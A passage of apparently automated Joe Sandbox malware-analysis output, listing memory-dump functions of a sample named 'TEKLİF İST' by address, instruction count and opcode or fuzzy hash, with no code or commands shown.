                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f422542ffe05b1961e82d850306ede44fbd0d2e8aa92aa49347dab80dbe3213
                                                                                                              • Instruction ID: f46a72e89484157975dafa9319789bfc954e4b35b0e63787174a3735e2951139
                                                                                                              • Opcode Fuzzy Hash: 1f422542ffe05b1961e82d850306ede44fbd0d2e8aa92aa49347dab80dbe3213
                                                                                                              • Instruction Fuzzy Hash: 3541DF31204B45DFDB2ADF28C480FDA7BE8EF49750F0184ADE69A8B250C770E804DB60
                                                                                                              Function 01BF4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f48a465eb52fa20eff330269a1df9f009e811d96b826f79834268e6962a3c79
                                                                                                              • Instruction ID: 905d7485dcf6446f7a4b3f39d6f222785828768c685d28498bb106082fd60053
                                                                                                              • Opcode Fuzzy Hash: 4f48a465eb52fa20eff330269a1df9f009e811d96b826f79834268e6962a3c79
                                                                                                              • Instruction Fuzzy Hash: 11315C716042019FD728DF29D880B6BB7E5FB84724F0545ADEA599B391E730E908CBA2
                                                                                                              Function 01BBEB1D Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 083df8a88d4f3eb1b667763dde9a6a17dae3c61fe98e4a9a284191e8ca89a75f
                                                                                                              • Instruction ID: a9aece12c78a3bde4413db72b5dd81a7f185b1ffd5b7a10eb397b550b3f6d4f8
                                                                                                              • Opcode Fuzzy Hash: 083df8a88d4f3eb1b667763dde9a6a17dae3c61fe98e4a9a284191e8ca89a75f
                                                                                                              • Instruction Fuzzy Hash: B331A6312016829BF73A575CCDC8BF57BD4FB41B84F1900E4AA46DBAF1DBA8D840C224
                                                                                                              Function 01C061C3 Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cc68ad447dea40dc6d4f806bf0c2512828af2e5c7b146f9c8f74a1a130c828d
                                                                                                              • Instruction ID: fe8bec62d50dffe96f95a4d21f58c2d1e1169b9ddced10cb648397610970c9dd
                                                                                                              • Opcode Fuzzy Hash: 8cc68ad447dea40dc6d4f806bf0c2512828af2e5c7b146f9c8f74a1a130c828d
                                                                                                              • Instruction Fuzzy Hash: D031E475A00226EBDB16DF98CC40BAEB7B9FB44B40F454168E900AB284D770ED50CBA0
                                                                                                              Function 01BE483A Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f19d033a0fe07c5932285a19463b5a57c7f39d2adb41d3caf428223cfc27d6ba
                                                                                                              • Instruction ID: 740b920cc0e8b8dd7f986478addef9c911d4ba302cb46b50de8b1616ecfa6427
                                                                                                              • Opcode Fuzzy Hash: f19d033a0fe07c5932285a19463b5a57c7f39d2adb41d3caf428223cfc27d6ba
                                                                                                              • Instruction Fuzzy Hash: BC314F76A4012DABCF259F54DC88BDEBBF9EB98750F1001E5A908E7250DB30DE918F90
                                                                                                              Function 01B6EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60e912a1db6314210c8fedf44bc8287eb4b420bedf4f9d39116560aca4cc8101
                                                                                                              • Instruction ID: f65f01ce94fbb453f99bcbff4800ac688ccfe384abc98805b7cbd78ace800ae7
                                                                                                              • Opcode Fuzzy Hash: 60e912a1db6314210c8fedf44bc8287eb4b420bedf4f9d39116560aca4cc8101
                                                                                                              • Instruction Fuzzy Hash: D631C476E00215AFDB25DFA9C880AAEBBF8EF14750F0545A5E916E7250D774DA008BA0
                                                                                                              Function 01C060B8 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f2d686fdd5b6adf315308ad6a49d7447cc33c4a4e6318239de0af4631478628
                                                                                                              • Instruction ID: c92d28f9738f12ec56aea69fe232a0ad8a4f4e423b94aec83669fdbafa06da2e
                                                                                                              • Opcode Fuzzy Hash: 6f2d686fdd5b6adf315308ad6a49d7447cc33c4a4e6318239de0af4631478628
                                                                                                              • Instruction Fuzzy Hash: 3231E571B40626EFDB279FA9CC50B6EBBB9AF44754F0040A9E906DB391DB30DD108B90
                                                                                                              Function 01B407AF Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3845e9951ed6c7067951e7bfbd996f5bbc2f344daa1789ddff2ffb4d40e802ba
                                                                                                              • Instruction ID: 9e1710846dd659c214c4e14e85929e233fc99da7331ddc88512c3a4f852cd5ea
                                                                                                              • Opcode Fuzzy Hash: 3845e9951ed6c7067951e7bfbd996f5bbc2f344daa1789ddff2ffb4d40e802ba
                                                                                                              • Instruction Fuzzy Hash: 0B310A32A04752DBDB1AEE28C940EAB7BA5EFD4250F0185A9FE5597310EB30DC11A7E1
                                                                                                              Function 01B48550 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0df9c4f48e1b98c92451ec6787018d0bb73b9eae0d4aa128500fd1e00687c1f7
                                                                                                              • Instruction ID: 14bc6598bcd5fca64e85a46992f5fa5c67bf540bd8bbad9101090dffca1f710b
                                                                                                              • Opcode Fuzzy Hash: 0df9c4f48e1b98c92451ec6787018d0bb73b9eae0d4aa128500fd1e00687c1f7
                                                                                                              • Instruction Fuzzy Hash: 4831AD716493018FE728CF19C840B2BBBE5FB98700F458AEEE98497351D770E844CB91
                                                                                                              Function 01B7A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction ID: 35d7d4edd059c5f53a481a85a58c4adbb84a9c5e9fd276ab7e6ecaa093554538
                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction Fuzzy Hash: 74311C72B00701AFD769CF79CD80B5ABBF8EB08B50F0805ADA56AC3650E770E900CB60
                                                                                                              Function 01BEEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 04db8f5618ef8c39cecb237366ffbb3bac57539e1b00f670de47bb5589455456
                                                                                                              • Instruction ID: 3d8804b51ffbda1418517f54cb14d2d54d383cf4e5d42e48d16571639c2a63da
                                                                                                              • Opcode Fuzzy Hash: 04db8f5618ef8c39cecb237366ffbb3bac57539e1b00f670de47bb5589455456
                                                                                                              • Instruction Fuzzy Hash: 8E31ABB1505342DFCB19DF19C548A5ABBF1FF8A218F044AEEE8889B351D331DA54CB92
                                                                                                              Function 01B6438F Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f0804fd7ed534f957959e53ea87a8f9b7b2d70666a75581e7e397a56e7eb1bc
                                                                                                              • Instruction ID: 65ef395f88d59aac73844bf6b03dbe267eafe6e50dcd8519479e804cc2300ac5
                                                                                                              • Opcode Fuzzy Hash: 1f0804fd7ed534f957959e53ea87a8f9b7b2d70666a75581e7e397a56e7eb1bc
                                                                                                              • Instruction Fuzzy Hash: 6F31F431B006059FDB2CEFA9C981B6EBBFDEBA4304F0085A9D506D3650DB34E941CB90
                                                                                                              Function 01B3CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction ID: c336ea0dc82055d7515bc06fa3bcfa38447301ec66e69ea8a910f1229f0a0a1c
                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction Fuzzy Hash: BF210436E4425AAADF199BB98840BAFBBB5EF54740F0681B69E15F7340E370D90187E0
                                                                                                              Function 01B3C156 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7567b023d357a141d9b954eabbcdef23bd31fadc4636dbf44f9c0df79b8759e1
                                                                                                              • Instruction ID: 71ad192a2c0a529abc2d68a1b7e63af8356ac348a78138272242d375c46df2e9
                                                                                                              • Opcode Fuzzy Hash: 7567b023d357a141d9b954eabbcdef23bd31fadc4636dbf44f9c0df79b8759e1
                                                                                                              • Instruction Fuzzy Hash: E83149B15002119BDF39AF69C840B6977B4EF51304F9481F9ED469B342DB38D983CB90
                                                                                                              Function 01BFC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: 4a190a39c137c9b67f6ec7064a277582de432e403e5004919f6245e1acd8ade3
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 23212B3660065AA7CF1DAB958800EBABFB4EF40710F40809EFBA587691E734D994C760
                                                                                                              Function 01B3E420 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d30c28f495a80df0e492b441e1840aca28114a913310759a7c0be59c8dc2b675
                                                                                                              • Instruction ID: cc5fc89e9231c568ecc7bca950c9309474de3afb9f44a472d3799f9fe540c249
                                                                                                              • Opcode Fuzzy Hash: d30c28f495a80df0e492b441e1840aca28114a913310759a7c0be59c8dc2b675
                                                                                                              • Instruction Fuzzy Hash: C731A232A01529ABDB399B18CC41FEE77B9EB55740F0101E2E645A7290D774EE90CF90
                                                                                                              Function 01B74588 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: ad40460884b1b73aef43de33fe909df548538c28d4edbbb914a2bd444e93fa5e
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: 8C216075A00609EBCF19CF98D980A9EBBB5FF48715F1080E5FE259B241D771EA05CB90
                                                                                                              Function 01B744B0 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b7e4dc99cba891266335ed85ca526d19c091b8b344a42643ad49f60929f6e4c
                                                                                                              • Instruction ID: 2a830bb67e00f6d7dec5097a2031194c299053841d84bcee099cf91b25eff6b7
                                                                                                              • Opcode Fuzzy Hash: 5b7e4dc99cba891266335ed85ca526d19c091b8b344a42643ad49f60929f6e4c
                                                                                                              • Instruction Fuzzy Hash: 5E21B1726047459BCB26DF18C880B6BB7E5FF88761F004699FD659B641D730E9008BA2
                                                                                                              Function 01B3E388 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: fc36ae449a4c65ee2b6f2da0a504b5621e3566d41496456553e093aed4a8989d
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 74317A31600605EFDB29DFA9C884F6AB7F9EF85354F1445A9E5528B290E730EE02CB50
                                                                                                              Function 01BBE609 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edb7fabfac94fed7b0d01ae2a53c62e111d08522b2721ad4fd96bf6001f4c2e0
                                                                                                              • Instruction ID: 9e0ab71a5e3baf68686b6d58c1a6916ef59289da0b32690b2414658ec67ec6e2
                                                                                                              • Opcode Fuzzy Hash: edb7fabfac94fed7b0d01ae2a53c62e111d08522b2721ad4fd96bf6001f4c2e0
                                                                                                              • Instruction Fuzzy Hash: 9E318F75A00216EFCB18CF18C4849EE77B5FF94704B154599F9069B7A1E7B1EA40CB90
                                                                                                              Function 01BC06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9511c1c2571d32cad6deb682cd6c985b85c7685726209d60d98f353a7f03a430
                                                                                                              • Instruction ID: fa023efa861ff9bb412150e85ebdd89143d03be3186e06fb655240b64b52cee7
                                                                                                              • Opcode Fuzzy Hash: 9511c1c2571d32cad6deb682cd6c985b85c7685726209d60d98f353a7f03a430
                                                                                                              • Instruction Fuzzy Hash: AA218275900129DBCF19DF59C881ABEB7F4FF48740B5000AAF941A7250D774AD51CBA1
                                                                                                              Function 01BC019F Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fbcf22fc0b06dae72462b48a561be8b372c0c179394b1d43ee23616ea20bfec3
                                                                                                              • Instruction ID: cf1f25b1bc2fa7ffa82d74f02d1fe045a4632475eabd859355db0c88600ee3c8
                                                                                                              • Opcode Fuzzy Hash: fbcf22fc0b06dae72462b48a561be8b372c0c179394b1d43ee23616ea20bfec3
                                                                                                              • Instruction Fuzzy Hash: 5C217A75600645EBDB19AB6DC980B6AB7A8FF98B40F1400A9F905DB6A0D734ED40CB64
                                                                                                              Function 01BC0283 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3706cad0f6f8ed1eff84ae92af5f967cf888022b3b213e312b75dafda20bb456
                                                                                                              • Instruction ID: 06722b9b2dcb2e3eeed0f6d0ffc8fb18529462fb4e5dfa45f51e4efbbdbc2095
                                                                                                              • Opcode Fuzzy Hash: 3706cad0f6f8ed1eff84ae92af5f967cf888022b3b213e312b75dafda20bb456
                                                                                                              • Instruction Fuzzy Hash: 8021B372904346DFD719EF59C884B5BBBECEFE5A40F08049ABD80CB261D734D904C6A1
                                                                                                              Function 01B62835 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c135b65cb8643c7e72e48f2d3040ed2b68554f4f1a3f7f42bffe635216a4553
                                                                                                              • Instruction ID: 380dec279c5fea5c31bb3e6a13f8c1607909ceb6ad1c647db701599c272dc05f
                                                                                                              • Opcode Fuzzy Hash: 4c135b65cb8643c7e72e48f2d3040ed2b68554f4f1a3f7f42bffe635216a4553
                                                                                                              • Instruction Fuzzy Hash: 1C21A731649681ABF72A577C8C44B287BD8EF51B64F1903E4FAA19B6E2D76CD801C250
                                                                                                              Function 01B7A30B Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c855194ad7887db42b91638bf3c8a272701d86f4195f946be34615d09d49cc7d
                                                                                                              • Instruction ID: 2426310a9ca722b0e448d7937683e3e5cab6f46f010da0990bf33cbe7d1cb947
                                                                                                              • Opcode Fuzzy Hash: c855194ad7887db42b91638bf3c8a272701d86f4195f946be34615d09d49cc7d
                                                                                                              • Instruction Fuzzy Hash: 6F21AC752006119FCB29DF29C841B5677F5FF48744F1884A8A519CBB61E371E842CB94
                                                                                                              Function 01BFA49A Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d374eb5406f7ecd7215fa32a1363ee55ec601eedd8bf85d2e6e307bee1d5a7b7
                                                                                                              • Instruction ID: f731db1fb08509254c107081aeeae08c5ec0b8363ea791ab609b1309556f75d2
                                                                                                              • Opcode Fuzzy Hash: d374eb5406f7ecd7215fa32a1363ee55ec601eedd8bf85d2e6e307bee1d5a7b7
                                                                                                              • Instruction Fuzzy Hash: E3113A32340B117FDB2E66749C04F27769ADBD4B20F1100ACB70CCB190DB60DC048795
                                                                                                              Function 01BC0946 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b81edc0c8a8c7dc924be540f159056e17413b7277b278fe3efce5171010df74f
                                                                                                              • Instruction ID: a6afe35a3a8a66294ffd78db6b8cd8b2e0275c4453c191b67ca4191b4e67ae7e
                                                                                                              • Opcode Fuzzy Hash: b81edc0c8a8c7dc924be540f159056e17413b7277b278fe3efce5171010df74f
                                                                                                              • Instruction Fuzzy Hash: 0621EBB5E00259EBDB14DF9AD881AAEFBF8FF98A00F10016EE405E7250D7709941CF60
                                                                                                              Function 01BD80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction ID: b42788e368143da5639c5918eb1b173bcd23ed62105dd6aa45213d03f857569e
                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction Fuzzy Hash: 24218E72A0020AEFDF1A9FA9CC40BAEBBB9EF48351F204495F904A7251E774D9509B50
                                                                                                              Function 01B70124 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction ID: ca855271ad73cec02365eef0bf53b63d84d7896c2e2043e1d96ce75f9315ce38
                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction Fuzzy Hash: A5110473600605BFDB2AAF46EC40F9BBBB9EB81754F1000AAF6118B180D7B1ED44CB50
